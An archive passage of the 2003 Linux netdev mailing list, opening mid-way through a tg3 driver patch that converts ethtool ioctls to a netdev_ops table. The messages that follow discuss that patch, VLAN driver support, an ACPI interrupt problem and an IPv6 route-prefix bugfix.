tg3_set_ringparam(struct net_device *dev, struct ethtool_ringparam *ering) +{ + struct tg3 *tp = dev->priv; - tg3_netif_stop(tp); - spin_lock_irq(&tp->lock); - spin_lock(&tp->tx_lock); - if (epause.autoneg) - tp->tg3_flags |= TG3_FLAG_PAUSE_AUTONEG; - else - tp->tg3_flags &= ~TG3_FLAG_PAUSE_AUTONEG; - if (epause.rx_pause) - tp->tg3_flags |= TG3_FLAG_PAUSE_RX; - else - tp->tg3_flags &= ~TG3_FLAG_PAUSE_RX; - if (epause.tx_pause) - tp->tg3_flags |= TG3_FLAG_PAUSE_TX; - else - tp->tg3_flags &= ~TG3_FLAG_PAUSE_TX; - tg3_halt(tp); - tg3_init_rings(tp); - tg3_init_hw(tp); - spin_unlock(&tp->tx_lock); - spin_unlock_irq(&tp->lock); - tg3_netif_start(tp); + if ((ering->rx_pending > TG3_RX_RING_SIZE - 1) || + (ering->rx_jumbo_pending > TG3_RX_JUMBO_RING_SIZE - 1) || + (ering->tx_pending > TG3_TX_RING_SIZE - 1)) + return -EINVAL; - return 0; - } - case ETHTOOL_GRXCSUM: { - struct ethtool_value edata = { ETHTOOL_GRXCSUM }; + tg3_netif_stop(tp); + spin_lock_irq(&tp->lock); + spin_lock(&tp->tx_lock); - edata.data = - (tp->tg3_flags & TG3_FLAG_RX_CHECKSUMS) != 0; - if (copy_to_user(useraddr, &edata, sizeof(edata))) - return -EFAULT; - return 0; - } - case ETHTOOL_SRXCSUM: { - struct ethtool_value edata; + tp->rx_pending = ering->rx_pending; + tp->rx_jumbo_pending = ering->rx_jumbo_pending; + tp->tx_pending = ering->tx_pending; + + tg3_halt(tp); + tg3_init_rings(tp); + tg3_init_hw(tp); + netif_wake_queue(tp->dev); + spin_unlock(&tp->tx_lock); + spin_unlock_irq(&tp->lock); + tg3_netif_start(tp); - if (copy_from_user(&edata, useraddr, sizeof(edata))) - return -EFAULT; + return 0; +} - if (tp->tg3_flags & TG3_FLAG_BROKEN_CHECKSUMS) { - if (edata.data != 0) - return -EINVAL; - return 0; - } +static void tg3_get_pauseparam(struct net_device *dev, struct ethtool_pauseparam *epause) +{ + struct tg3 *tp = dev->priv; - spin_lock_irq(&tp->lock); - if (edata.data) - tp->tg3_flags |= TG3_FLAG_RX_CHECKSUMS; - else - tp->tg3_flags &= ~TG3_FLAG_RX_CHECKSUMS; - spin_unlock_irq(&tp->lock); + epause->autoneg = (tp->tg3_flags & TG3_FLAG_PAUSE_AUTONEG) != 0; + epause->rx_pause = (tp->tg3_flags & TG3_FLAG_PAUSE_RX) != 0; + epause->tx_pause = (tp->tg3_flags & TG3_FLAG_PAUSE_TX) != 0; +} - return 0; - } - case ETHTOOL_GTXCSUM: { - struct ethtool_value edata = { ETHTOOL_GTXCSUM }; +static int tg3_set_pauseparam(struct net_device *dev, struct ethtool_pauseparam *epause) +{ + struct tg3 *tp = dev->priv; - edata.data = - (tp->dev->features & NETIF_F_IP_CSUM) != 0; - if (copy_to_user(useraddr, &edata, sizeof(edata))) - return -EFAULT; - return 0; - } - case ETHTOOL_STXCSUM: { - struct ethtool_value edata; + tg3_netif_stop(tp); + spin_lock_irq(&tp->lock); + spin_lock(&tp->tx_lock); + if (epause->autoneg) + tp->tg3_flags |= TG3_FLAG_PAUSE_AUTONEG; + else + tp->tg3_flags &= ~TG3_FLAG_PAUSE_AUTONEG; + if (epause->rx_pause) + tp->tg3_flags |= TG3_FLAG_PAUSE_RX; + else + tp->tg3_flags &= ~TG3_FLAG_PAUSE_RX; + if (epause->tx_pause) + tp->tg3_flags |= TG3_FLAG_PAUSE_TX; + else + tp->tg3_flags &= ~TG3_FLAG_PAUSE_TX; + tg3_halt(tp); + tg3_init_rings(tp); + tg3_init_hw(tp); + spin_unlock(&tp->tx_lock); + spin_unlock_irq(&tp->lock); + tg3_netif_start(tp); - if (copy_from_user(&edata, useraddr, sizeof(edata))) - return -EFAULT; + return 0; +} - if (tp->tg3_flags & TG3_FLAG_BROKEN_CHECKSUMS) { - if (edata.data != 0) - return -EINVAL; - return 0; - } +static u32 tg3_get_rx_csum(struct net_device *dev) +{ + struct tg3 *tp = dev->priv; + return (tp->tg3_flags & TG3_FLAG_RX_CHECKSUMS) != 0; +} - if (edata.data) - tp->dev->features |= NETIF_F_IP_CSUM; - else - tp->dev->features &= ~NETIF_F_IP_CSUM; +static int tg3_set_rx_csum(struct net_device *dev, u32 data) +{ + struct tg3 *tp = dev->priv; + if (tp->tg3_flags & TG3_FLAG_BROKEN_CHECKSUMS) { + if (data != 0) + return -EINVAL; return 0; } - case ETHTOOL_GSG: { - struct ethtool_value edata = { ETHTOOL_GSG }; - edata.data = - (tp->dev->features & NETIF_F_SG) != 0; - if (copy_to_user(useraddr, &edata, sizeof(edata))) - return -EFAULT; - return 0; - } - case ETHTOOL_SSG: { - struct ethtool_value edata; + spin_lock_irq(&tp->lock); + if (data) + tp->tg3_flags |= TG3_FLAG_RX_CHECKSUMS; + else + tp->tg3_flags &= ~TG3_FLAG_RX_CHECKSUMS; + spin_unlock_irq(&tp->lock); - if (copy_from_user(&edata, useraddr, sizeof(edata))) - return -EFAULT; + return 0; +} - if (edata.data) - tp->dev->features |= NETIF_F_SG; - else - tp->dev->features &= ~NETIF_F_SG; +static int tg3_set_tx_csum(struct net_device *dev, u32 data) +{ + struct tg3 *tp = dev->priv; + if (tp->tg3_flags & TG3_FLAG_BROKEN_CHECKSUMS) { + if (data != 0) + return -EINVAL; return 0; } - }; - return -EOPNOTSUPP; + if (data) + dev->features |= NETIF_F_IP_CSUM; + else + dev->features &= ~NETIF_F_IP_CSUM; + + return 0; } +static struct netdev_ops tg3_netdev_ops = { + .get_settings = tg3_get_settings, + .set_settings = tg3_set_settings, + .get_drvinfo = tg3_get_drvinfo, + .get_regs_len = tg3_get_regs_len, + .get_regs = tg3_get_regs, + .get_wol = tg3_get_wol, + .set_wol = tg3_set_wol, + .get_msglevel = tg3_get_msglevel, + .set_msglevel = tg3_set_msglevel, + .nway_reset = tg3_nway_reset, + .get_link = netdev_op_get_link, + .get_ringparam = tg3_get_ringparam, + .set_ringparam = tg3_set_ringparam, + .get_pauseparam = tg3_get_pauseparam, + .set_pauseparam = tg3_set_pauseparam, + .get_rx_csum = tg3_get_rx_csum, + .set_rx_csum = tg3_set_rx_csum, + .get_tx_csum = netdev_op_get_tx_csum, + .set_tx_csum = tg3_set_tx_csum, + .get_sg = netdev_op_get_sg, + .set_sg = netdev_op_set_sg, +}; + static int tg3_ioctl(struct net_device *dev, struct ifreq *ifr, int cmd) { struct mii_ioctl_data *data = (struct mii_ioctl_data *)&ifr->ifr_data; @@ -5490,8 +5391,6 @@ static int tg3_ioctl(struct net_device * int err; switch(cmd) { - case SIOCETHTOOL: - return tg3_ethtool_ioctl(dev, (void *) ifr->ifr_data); case SIOCGMIIPHY: data->phy_id = PHY_ADDR; @@ -6773,6 +6672,7 @@ static int __devinit tg3_init_one(struct tp->rx_jumbo_pending = TG3_DEF_RX_JUMBO_RING_PENDING; tp->tx_pending = TG3_DEF_TX_RING_PENDING; + dev->netdev_ops = &tg3_netdev_ops; dev->open = tg3_open; dev->stop = tg3_close; dev->get_stats = tg3_get_stats; -- "It's not Hollywood. War is real, war is primarily not about defeat or victory, it is about death. I've seen thousands and thousands of dead bodies. Do you think I want to have an academic debate on this subject?" -- Robert Fisk From greearb@candelatech.com Wed Jul 9 10:11:43 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 09 Jul 2003 10:11:49 -0700 (PDT) Received: from grok.yi.org (evrtwa1-ar2-4-33-045-074.evrtwa1.dsl-verizon.net [4.33.45.74]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h69HBM2x028953 for ; Wed, 9 Jul 2003 10:11:43 -0700 Received: from candelatech.com (localhost.localdomain [127.0.0.1]) by grok.yi.org (8.12.8/8.12.8) with ESMTP id h69HB5Kk007597; Wed, 9 Jul 2003 10:11:05 -0700 Message-ID: <3F0C4CA8.7090502@candelatech.com> Date: Wed, 09 Jul 2003 10:11:04 -0700 From: Ben Greear Organization: Candela Technologies User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.4) Gecko/20030529 X-Accept-Language: en-us, en MIME-Version: 1.0 To: Matthew Wilcox CC: netdev@oss.sgi.com, "David S. Miller" , Arnaldo Carvalho de Melo , Jeff Garzik Subject: Re: [PATCH] netdev_ops References: <20030708163042.GL23597@parcelfarce.linux.theplanet.co.uk> <3F0B2D30.4020102@candelatech.com> <20030708212551.GL1939@parcelfarce.linux.theplanet.co.uk> <20030708.150835.78728697.davem@redhat.com> <20030709161520.GW1939@parcelfarce.linux.theplanet.co.uk> In-Reply-To: <20030709161520.GW1939@parcelfarce.linux.theplanet.co.uk> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 3861 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: greearb@candelatech.com Precedence: bulk X-list: netdev Matthew Wilcox wrote: > Changes since yesterday's patch: > > - Make all methods take the struct net_device as suggested by Ben Greear. > - Rename self_test_len() and get_stats_len() to *_count() to reflect > that they return a count of elements, not a byte length. > - Related bugfixes. > - Remove the get_strings_len() method; we now infer the length from > either self_test_count() or get_stats_count(). > - memset() the drvinfo struct so it doesn't leak information from the > kernel stack (existing bug in tg3). > - Clamp regs.len in ethtool.c rather than in the driver. > - Pass the stringset value to get_strings() rather than a pointer to > the whole ethtool_gstrings struct. > > I have a question about the error return values in ethtool_get_strings(). > Are -EOPNOTSUPP and -EINVAL the right ones to use in the case statement? > Or should I perhaps be using -ENOSYS instead of EINVAL? I've noticed > drepper tends to prefer this for unimplemented subops. Since this is > an ioctl(), perhaps I should be using -ENOTTY instead ;-) Considering any number of things may change in the future, what do you think of adding a global 'nettool-version' method. That could allow user-space code to take appropriate action if something ever changes in a non-compatible way.... Also, for the strings (labels) passed back to user space, is there any documentation for suggested values for these strings? Even though we can't be completely type-safe, if there were suggested values in a comment in the code, it could help a great deal for any code trying to parse them for multiple different drivers/nics. Ben -- Ben Greear President of Candela Technologies Inc http://www.candelatech.com ScryMUD: http://scry.wanfear.com http://scry.wanfear.com/~greear From greearb@candelatech.com Wed Jul 9 10:13:31 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 09 Jul 2003 10:13:36 -0700 (PDT) Received: from grok.yi.org (evrtwa1-ar2-4-33-045-074.evrtwa1.dsl-verizon.net [4.33.45.74]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h69HDU2x029220 for ; Wed, 9 Jul 2003 10:13:31 -0700 Received: from candelatech.com (localhost.localdomain [127.0.0.1]) by grok.yi.org (8.12.8/8.12.8) with ESMTP id h69HDBKk007852; Wed, 9 Jul 2003 10:13:11 -0700 Message-ID: <3F0C4D27.20907@candelatech.com> Date: Wed, 09 Jul 2003 10:13:11 -0700 From: Ben Greear Organization: Candela Technologies User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.4) Gecko/20030529 X-Accept-Language: en-us, en MIME-Version: 1.0 To: "Hen, Shmulik" CC: Andrius Kasparavicius , netdev@oss.sgi.com Subject: Re: network interface cards native vlans support in linux kernel? References: In-Reply-To: Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 3862 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: greearb@candelatech.com Precedence: bulk X-list: netdev Hen, Shmulik wrote: > Do you mean "native" as in hardware acceleration offloading? > If that's the case than the 8021q vlan module handshakes with the device driver to check for support and that's it. No need to do any settings on the device. In case there is no offloading support, the vlan module will take care of all stripping/inserting of the vlan tag into place. > On the other hand, if the device cannot handle 1504 byte packets, it defines itself as "vlan challenged" and you can't use vlan on it at all. Even challenged ones can work if you set your MTU (and all peer MTUs) to 4 less than normal, ie 1496. Ben > > -- Ben Greear President of Candela Technologies Inc http://www.candelatech.com ScryMUD: http://scry.wanfear.com http://scry.wanfear.com/~greear From greearb@candelatech.com Wed Jul 9 10:15:50 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 09 Jul 2003 10:15:53 -0700 (PDT) Received: from grok.yi.org (evrtwa1-ar2-4-33-045-074.evrtwa1.dsl-verizon.net [4.33.45.74]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h69HFn2x029606 for ; Wed, 9 Jul 2003 10:15:50 -0700 Received: from candelatech.com (localhost.localdomain [127.0.0.1]) by grok.yi.org (8.12.8/8.12.8) with ESMTP id h69HFfKk008170; Wed, 9 Jul 2003 10:15:41 -0700 Message-ID: <3F0C4DBD.8020007@candelatech.com> Date: Wed, 09 Jul 2003 10:15:41 -0700 From: Ben Greear Organization: Candela Technologies User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.4) Gecko/20030529 X-Accept-Language: en-us, en MIME-Version: 1.0 To: Andrius Kasparavicius CC: netdev@oss.sgi.com Subject: Re: network interface cards native vlans support in linux kernel? References: In-Reply-To: Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 3863 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: greearb@candelatech.com Precedence: bulk X-list: netdev Andrius Kasparavicius wrote: > hello, as far as i know, currently there is no native vlan support in > network device drivers. I mean, always need patching MTU.. add 4 bytes.. > :-( > > is there any problems to include full vlans support? Intel's e100 driver (and all NICs supported by it) support vlans fine, as do most of the GigE NICs. Tulip does not, last I hear, though a work-around patch has been around forever. Realtek worked at one time, not sure about now though... Ben > > > Andrius > -- Ben Greear President of Candela Technologies Inc http://www.candelatech.com ScryMUD: http://scry.wanfear.com http://scry.wanfear.com/~greear From willy@www.linux.org.uk Wed Jul 9 10:25:31 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 09 Jul 2003 10:25:38 -0700 (PDT) Received: from www.linux.org.uk (IDENT:IGTH7NcxQdNtrnY8ih8VlTNxdqHouBop@parcelfarce.linux.theplanet.co.uk [195.92.249.252]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h69HPT2x001623 for ; Wed, 9 Jul 2003 10:25:30 -0700 Received: from willy by www.linux.org.uk with local (Exim 4.14) id 19aIh3-0006Yh-J5; Wed, 09 Jul 2003 18:25:25 +0100 Date: Wed, 9 Jul 2003 18:25:25 +0100 From: Matthew Wilcox To: Ben Greear Cc: Matthew Wilcox , netdev@oss.sgi.com, "David S. Miller" , Arnaldo Carvalho de Melo , Jeff Garzik Subject: Re: [PATCH] netdev_ops Message-ID: <20030709172525.GZ1939@parcelfarce.linux.theplanet.co.uk> References: <20030708163042.GL23597@parcelfarce.linux.theplanet.co.uk> <3F0B2D30.4020102@candelatech.com> <20030708212551.GL1939@parcelfarce.linux.theplanet.co.uk> <20030708.150835.78728697.davem@redhat.com> <20030709161520.GW1939@parcelfarce.linux.theplanet.co.uk> <3F0C4CA8.7090502@candelatech.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <3F0C4CA8.7090502@candelatech.com> User-Agent: Mutt/1.4.1i X-archive-position: 3864 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: willy@debian.org Precedence: bulk X-list: netdev On Wed, Jul 09, 2003 at 10:11:04AM -0700, Ben Greear wrote: > Considering any number of things may change in the future, what do > you think of adding a global 'nettool-version' method. That could > allow user-space code to take appropriate action if something ever > changes in a non-compatible way.... This patch makes only user-invisible changes. I'm trying to establish a base for further cleanups (eg, acme wants to look at unifying the wireless ops and the existing net_device function pointers into netdev_ops). I don't really have a position on adding a nettool-version ioctl or whatever, but I'm not sure it would make sense to have that as a netdev method. > Also, for the strings (labels) passed back to user space, is there any > documentation for suggested values for these strings? Even though we > can't be completely type-safe, if there were suggested values in > a comment in the code, it could help a great deal for any code trying to > parse them for multiple different drivers/nics. I didn't see any documentation; I just read the code. The only drivers I noticed supporting the GSTRINGS subcommand are 8139cp, 8139too, e100 and e1000. -- "It's not Hollywood. War is real, war is primarily not about defeat or victory, it is about death. I've seen thousands and thousands of dead bodies. Do you think I want to have an academic debate on this subject?" -- Robert Fisk From kpfleming@cox.net Wed Jul 9 10:34:29 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 09 Jul 2003 10:34:37 -0700 (PDT) Received: from fed1mtao07.cox.net (fed1mtao07.cox.net [68.6.19.124]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h69HY92x002025 for ; Wed, 9 Jul 2003 10:34:29 -0700 Received: from jeeves.kpf.internal ([24.56.60.83]) by fed1mtao07.cox.net (InterMail vM.5.01.04.05 201-253-122-122-105-20011231) with ESMTP id <20030709173402.IZZS29962.fed1mtao07.cox.net@jeeves.kpf.internal>; Wed, 9 Jul 2003 13:34:02 -0400 Received: from [192.168.172.107] (helo=cox.net) by jeeves.kpf.internal with esmtp (Exim 4.05) id 19aIpP-0001UK-00; Wed, 09 Jul 2003 10:34:03 -0700 Message-ID: <3F0C520E.2080809@cox.net> Date: Wed, 09 Jul 2003 10:34:06 -0700 From: "Kevin P. Fleming" User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.4) Gecko/20030624 X-Accept-Language: en-us, en MIME-Version: 1.0 To: acpi-support@lists.sourceforge.net, netdev@oss.sgi.com Subject: How to begin debugging ACPI/network driver interrupt problem? Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 3865 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: kpfleming@cox.net Precedence: bulk X-list: netdev I've got a system here using an MSI KT266-based motherboard that's been running 2.5.X successfully for months now. However, 2.5.73/74 have introduced a problem that (so far) I have only been able to cure by either not compiling in ACPI or using acpi=off on the kernel command line. The system three NICs: eth0 is a National Semiconductor DP83815 eth1 is a National Semiconductor DP83820 eth2 is a Lite-On 82C168 All three NICs work fine. However, on the newer kernels, with ACPI compiled in, during initialization of eth0 the kernel generates "IRQ 17 and nobody cared!" messages and disables IRQ 17, which causes eth0 to be useless :-) With older kernels, or ACPI not turned on, eth0 still gets assigned IRQ 17, and works just fine. IRQ 17 is not shared with any other devices. I don't think I can handle the additional message traffic of these two mailing lists, so I haven't subscribed... If anyone can suggest a course of action for how to debug this problem, please cc me on any responses. From greearb@candelatech.com Wed Jul 9 11:30:39 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 09 Jul 2003 11:31:05 -0700 (PDT) Received: from grok.yi.org (evrtwa1-ar2-4-33-045-074.evrtwa1.dsl-verizon.net [4.33.45.74]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h69ITr2x003913 for ; Wed, 9 Jul 2003 11:30:38 -0700 Received: from candelatech.com (localhost.localdomain [127.0.0.1]) by grok.yi.org (8.12.8/8.12.8) with ESMTP id h69IOZKk016833; Wed, 9 Jul 2003 11:24:35 -0700 Message-ID: <3F0C5DE3.7000506@candelatech.com> Date: Wed, 09 Jul 2003 11:24:35 -0700 From: Ben Greear Organization: Candela Technologies User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.4) Gecko/20030529 X-Accept-Language: en-us, en MIME-Version: 1.0 To: Jeff Garzik CC: Matthew Wilcox , netdev@oss.sgi.com, "David S. Miller" , Arnaldo Carvalho de Melo Subject: Re: [PATCH] netdev_ops References: <20030708163042.GL23597@parcelfarce.linux.theplanet.co.uk> <3F0B2D30.4020102@candelatech.com> <20030708212551.GL1939@parcelfarce.linux.theplanet.co.uk> <20030708.150835.78728697.davem@redhat.com> <20030709161520.GW1939@parcelfarce.linux.theplanet.co.uk> <3F0C4CA8.7090502@candelatech.com> <20030709181459.GE15293@gtf.org> In-Reply-To: <20030709181459.GE15293@gtf.org> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 3866 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: greearb@candelatech.com Precedence: bulk X-list: netdev Jeff Garzik wrote: > On Wed, Jul 09, 2003 at 10:11:04AM -0700, Ben Greear wrote: > >>Also, for the strings (labels) passed back to user space, is there any >>documentation for suggested values for these strings? Even though we >>can't be completely type-safe, if there were suggested values in >>a comment in the code, it could help a great deal for any code trying to >>parse them for multiple different drivers/nics. > > > The strings represent NIC-specific attributes. Yes, but surely there is some comonality? I'm not asking for something set in stone, but just some general guidelines. However, I don't feel too strongly about this, so if it is not worth the time/effort, then I'll still be happy :) Ben > > Jeff > > -- Ben Greear President of Candela Technologies Inc http://www.candelatech.com ScryMUD: http://scry.wanfear.com http://scry.wanfear.com/~greear From yoshfuji@linux-ipv6.org Wed Jul 9 11:30:41 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 09 Jul 2003 11:31:07 -0700 (PDT) Received: from yue.hongo.wide.ad.jp (yue.hongo.wide.ad.jp [203.178.139.94]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h69IU12x003915 for ; Wed, 9 Jul 2003 11:30:39 -0700 Received: from localhost (localhost [127.0.0.1]) by yue.hongo.wide.ad.jp (8.12.3+3.5Wbeta/8.12.3/Debian-5) with ESMTP id h69IVHBo025676; Thu, 10 Jul 2003 03:31:17 +0900 Date: Thu, 10 Jul 2003 03:31:17 +0900 (JST) Message-Id: <20030710.033117.93244305.yoshfuji@linux-ipv6.org> To: Jean-Luc.Richier@imag.fr Cc: pekkas@netcore.fi, linux-kernel@vger.kernel.org, netdev@oss.sgi.com, yoshfuji@linux-ipv6.org Subject: Re: Bug in Linux 2.5.74 IPv6 routing From: YOSHIFUJI Hideaki / =?iso-2022-jp?B?GyRCNUhGIzFRTEAbKEI=?= In-Reply-To: <20030709195237.A8550@horus.imag.fr> References: <20030709195237.A8550@horus.imag.fr> Organization: USAGI Project X-URL: http://www.yoshifuji.org/%7Ehideaki/ X-Fingerprint: 90 22 65 EB 1E CF 3A D1 0B DF 80 D8 48 07 F8 94 E0 62 0E EA X-PGP-Key-URL: http://www.yoshifuji.org/%7Ehideaki/hideaki@yoshifuji.org.asc X-Face: "5$Al-.M>NJ%a'@hhZdQm:."qn~PA^gq4o*>iCFToq*bAi#4FRtx}enhuQKz7fNqQz\BYU] $~O_5m-9'}MIs`XGwIEscw;e5b>n"B_?j/AkL~i/MEaZBLP X-Mailer: Mew version 2.2 on Emacs 20.7 / Mule 4.1 (AOI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 3867 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: yoshfuji@linux-ipv6.org Precedence: bulk X-list: netdev CC: netdev In article <20030709195237.A8550@horus.imag.fr> (at Wed, 9 Jul 2003 19:52:37 +0200), Jean-Luc Richier says: > There is a bug in IPv6 route calculation since kernel 2.5.71. It affects > all routes with prefix length != 0 (mod 8) > The bug is as follows: > do: ip -6 route add 2000::/3 via 2001:688:121:10::1 > ip -6 route > It shows a route for ::/3, not for 2000::/3 good catch. > PATCH 2: avoid overwriting the set value > --- linux-2.5.74/include/net/ipv6.h.DIST 2003-07-02 22:53:44.000000000 +0200 > +++ linux-2.5.74/include/net/ipv6.h 2003-07-09 18:51:25.000000000 +0200 > @@ -276,8 +276,10 @@ > b = plen & 0x7; > > memcpy(pfx->s6_addr, addr, o); > - if (b != 0) > + if (b != 0) { > pfx->s6_addr[o] = addr->s6_addr[o] & (0xff00 >> b); > + o++; > + } > if (o < 16) > memset(pfx->s6_addr + o, 0, 16 - o); > } > Ok, let's use this one. --yoshfuji From yoshfuji@linux-ipv6.org Wed Jul 9 11:43:11 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 09 Jul 2003 11:43:15 -0700 (PDT) Received: from yue.hongo.wide.ad.jp (yue.hongo.wide.ad.jp [203.178.139.94]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h69Ih92x004614 for ; Wed, 9 Jul 2003 11:43:10 -0700 Received: from localhost (localhost [127.0.0.1]) by yue.hongo.wide.ad.jp (8.12.3+3.5Wbeta/8.12.3/Debian-5) with ESMTP id h69IiQBo025781; Thu, 10 Jul 2003 03:44:26 +0900 Date: Thu, 10 Jul 2003 03:44:25 +0900 (JST) Message-Id: <20030710.034425.55677522.yoshfuji@linux-ipv6.org> To: davem@redhat.com, jmorris@intercode.com.au CC: Jean-Luc.Richier@imag.fr, pekkas@netcore.fi, yoshfuji@linux-ipv6.org, netdev@oss.sgi.com Subject: Re: Bug in Linux 2.5.74 IPv6 routing From: YOSHIFUJI Hideaki / =?iso-2022-jp?B?GyRCNUhGIzFRTEAbKEI=?= In-Reply-To: <20030710.033117.93244305.yoshfuji@linux-ipv6.org> References: <20030709195237.A8550@horus.imag.fr> <20030710.033117.93244305.yoshfuji@linux-ipv6.org> Organization: USAGI Project X-URL: http://www.yoshifuji.org/%7Ehideaki/ X-Fingerprint: 90 22 65 EB 1E CF 3A D1 0B DF 80 D8 48 07 F8 94 E0 62 0E EA X-PGP-Key-URL: http://www.yoshifuji.org/%7Ehideaki/hideaki@yoshifuji.org.asc X-Face: "5$Al-.M>NJ%a'@hhZdQm:."qn~PA^gq4o*>iCFToq*bAi#4FRtx}enhuQKz7fNqQz\BYU] $~O_5m-9'}MIs`XGwIEscw;e5b>n"B_?j/AkL~i/MEaZBLP X-Mailer: Mew version 2.2 on Emacs 20.7 / Mule 4.1 (AOI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=iso-2022-jp Content-Transfer-Encoding: 7bit X-archive-position: 3868 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: yoshfuji@linux-ipv6.org Precedence: bulk X-list: netdev In article <20030710.033117.93244305.yoshfuji@linux-ipv6.org> (at Thu, 10 Jul 2003 03:31:17 +0900 (JST)), YOSHIFUJI Hideaki / $B5HF#1QL@(B says: > Ok, let's use this one. Please apply this patch. D: Fix ipv6_addr_prefix() for prefixlen != 0 (mod 8). D: Patch from Jean-Luc RICHIER . --- linux-2.5.74/include/net/ipv6.h.DIST 2003-07-02 22:53:44.000000000 +0200 +++ linux-2.5.74/include/net/ipv6.h 2003-07-09 18:51:25.000000000 +0200 @@ -276,8 +276,10 @@ b = plen & 0x7; memcpy(pfx->s6_addr, addr, o); - if (b != 0) + if (b != 0) { pfx->s6_addr[o] = addr->s6_addr[o] & (0xff00 >> b); + o++; + } if (o < 16) memset(pfx->s6_addr + o, 0, 16 - o); } -- Hideaki YOSHIFUJI @ USAGI Project GPG FP: 9022 65EB 1ECF 3AD1 0BDF 80D8 4807 F894 E062 0EEA From garzik@gtf.org Wed Jul 9 11:44:07 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 09 Jul 2003 11:44:10 -0700 (PDT) Received: from havoc.gtf.org (host-64-213-145-173.atlantasolutions.com [64.213.145.173] (may be forged)) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h69Ihu2x004834 for ; Wed, 9 Jul 2003 11:43:57 -0700 Received: by havoc.gtf.org (Postfix, from userid 500) id E83A46643; Wed, 9 Jul 2003 14:14:59 -0400 (EDT) Date: Wed, 9 Jul 2003 14:14:59 -0400 From: Jeff Garzik To: Ben Greear Cc: Matthew Wilcox , netdev@oss.sgi.com, "David S. Miller" , Arnaldo Carvalho de Melo Subject: Re: [PATCH] netdev_ops Message-ID: <20030709181459.GE15293@gtf.org> References: <20030708163042.GL23597@parcelfarce.linux.theplanet.co.uk> <3F0B2D30.4020102@candelatech.com> <20030708212551.GL1939@parcelfarce.linux.theplanet.co.uk> <20030708.150835.78728697.davem@redhat.com> <20030709161520.GW1939@parcelfarce.linux.theplanet.co.uk> <3F0C4CA8.7090502@candelatech.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <3F0C4CA8.7090502@candelatech.com> User-Agent: Mutt/1.3.28i X-archive-position: 3869 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jgarzik@pobox.com Precedence: bulk X-list: netdev On Wed, Jul 09, 2003 at 10:11:04AM -0700, Ben Greear wrote: > Also, for the strings (labels) passed back to user space, is there any > documentation for suggested values for these strings? Even though we > can't be completely type-safe, if there were suggested values in > a comment in the code, it could help a great deal for any code trying to > parse them for multiple different drivers/nics. The strings represent NIC-specific attributes. Jeff From shemminger@osdl.org Wed Jul 9 11:45:06 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 09 Jul 2003 11:45:10 -0700 (PDT) Received: from mail.osdl.org (air-2.osdl.org [65.172.181.6]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h69Ij52x005283 for ; Wed, 9 Jul 2003 11:45:06 -0700 Received: from dell_ss3.pdx.osdl.net (dell_ss3.pdx.osdl.net [172.20.1.60]) by mail.osdl.org (8.11.6/8.11.6) with SMTP id h69IhYI03705; Wed, 9 Jul 2003 11:43:35 -0700 Date: Wed, 9 Jul 2003 11:43:34 -0700 From: Stephen Hemminger To: "Paul Rolland" , cfriesen@nortelnetworks.com, paulus@samba.org Cc: linux-ppp@vger.kernel.org, netdev@oss.sgi.com Subject: Re: [BUG]: problem when shutting down ppp connection since 2.5.70 Message-Id: <20030709114334.5b8cf7c6.shemminger@osdl.org> 